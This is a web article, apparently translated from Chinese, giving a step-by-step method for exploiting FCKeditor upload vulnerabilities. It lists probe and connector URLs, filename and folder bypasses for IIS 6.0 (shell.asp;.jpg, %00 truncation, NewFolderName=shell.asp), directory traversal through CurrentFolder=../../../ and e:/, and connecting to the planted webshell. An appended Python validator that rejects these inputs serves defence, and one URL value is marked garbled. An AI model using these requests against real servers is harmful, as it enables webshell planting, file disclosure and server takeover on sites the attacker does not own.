I. About FCKeditor
FCKeditor is a web-based rich-text editor that is bundled with many content management systems.
This article briefly introduces the approach to exploiting FCKeditor's upload vulnerabilities and lists the operations that may be possible.
II. Attack approach
1. Check the FCKeditor version
http://127.0.0.1/fckeditor/editor/dialog/fck_about.html
http://127.0.0.1/FCKeditor/_whatsnew.html
2. Test the upload points
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=(value garbled in the source)
3. Bypassing restrictions
3.1 Upload restrictions
There are many ways to get past upload restrictions; the main ones are intercepting the request and changing the extension, %00 truncation, and adding a file header.
3.2 Filename restrictions
3.2.1 Second-upload bypass: "." in the filename is changed to "_"
When a file such as shell.asp;.jpg is uploaded through FCK, the filename is automatically rewritten to shell_asp;.jpg. If a file with the same name is uploaded again, the new filename becomes shell.asp;(1).jpg.
3.2.2 Submitting shell.php followed by a space to bypass
A trailing space only works on Windows; Linux does not support it. Submitting shell.php followed by a space bypasses the filename restriction.
3.3 IIS 6.0: bypassing the folder restriction
fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
3.4 File-parsing restrictions
On the file upload page of the FCKeditor editor, create a folder with a name such as 1.asp, then upload an image (webshell) file into that folder and obtain its webshell.
http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg
4. Listing directories
4.1 FCKeditor/editor/fckeditor.html
fckeditor/editor/fckeditor.html cannot upload files. Click the image upload button, then choose Browse Server to jump to the uploadable-files page and view the files that have already been uploaded.
4.2 Check the site directory from the information returned in the XML
http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
4.3 Get the current folder
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
4.4 Browse files on the E: drive
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/
5. Connecting to the trojan
Once the trojan can be parsed by the server, connect to it with any of the usual tools and obtain the webshell. At this point the file has been uploaded through FCKeditor and the attack process is complete.
III. Other notes
After obtaining a webshell there are many operations that can be performed, and privilege escalation is easy; obtaining host privileges is not difficult.
As for defending against this vulnerability, all upload points can be removed and directory access restricted.
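As an added defender-side example (not code from this article or from FCKeditor), the checks below reject the inputs used in sections 3 and 4 above before anything is stored: %00 truncation, the trailing space, shell.asp;(1).jpg, a NewFolderName such as 1.asp, and CurrentFolder values like ../../../ or e:/. The two extension lists and the function names are assumptions for this example; adjust them to the deployment.

```python
import re

# Constructed for this example: image extensions accepted for the "Image" resource type.
ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "gif", "png", "bmp"}
# Extensions IIS 6, PHP or Tomcat would execute if they appear anywhere in a name or path.
EXECUTABLE_EXT = {"asp", "aspx", "asa", "cer", "cdx", "php", "php3", "php5", "phtml", "jsp", "jspx"}

def normalise_name(name: str) -> str:
    """Canonicalise a client-supplied file name the way the server's filesystem will:
    drop everything from the first NUL byte (the %00 truncation trick), keep only the
    last path component, and strip trailing spaces and dots (Windows discards them)."""
    name = name.split("\x00", 1)[0]
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    return name.rstrip(" .")

def dangerous_segments(name: str) -> list:
    """Dot- or semicolon-delimited pieces after the base name that are executable extensions.
    shell.asp;(1).jpg -> ['asp']: IIS 6 stops parsing at ';' and runs the file as ASP.
    shell.asp.jpg     -> ['asp']: some Apache setups fall back to the first handler they know."""
    pieces = re.split(r"[.;]", name.lower())
    return [p for p in pieces[1:] if p in EXECUTABLE_EXT]

def accept_upload(name: str, resource_type: str = "Image") -> tuple:
    """Return (True, clean_name) if the upload may be stored, else (False, reason)."""
    clean = normalise_name(name)
    if not clean or "." not in clean:
        return False, "no extension"
    bad = dangerous_segments(clean)
    if bad:
        return False, "executable extension inside name: " + ",".join(bad)
    ext = clean.rsplit(".", 1)[1].lower()
    if resource_type == "Image" and ext not in ALLOWED_IMAGE_EXT:
        return False, "extension ." + ext + " not allowed for " + resource_type
    return True, clean

def accept_folder(new_folder_name: str) -> bool:
    """NewFolderName must be one plain token: no dots (IIS 6 executes /1.asp/1.jpg as ASP),
    no separators, no NUL bytes, no traversal."""
    return re.fullmatch(r"[A-Za-z0-9_-]{1,64}", new_folder_name) is not None

def accept_current_folder(current_folder: str) -> bool:
    """CurrentFolder must stay inside the upload root: '/' followed by plain tokens each
    ending in '/', so '../../../' and 'e:/' are both refused."""
    return re.fullmatch(r"/(?:[A-Za-z0-9_-]+/)*", current_folder) is not None
```

Rejecting the submitted name outright, rather than rewriting "." to "_" as FCK did, avoids the duplicate-name renaming that produced shell.asp;(1).jpg in section 3.2.1.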
This article was contributed by 无言温柔天然对象 and does not represent the position of 舒华文档; if reposting, please cite the source: https://www.chinashuhua.cn/24/604935.html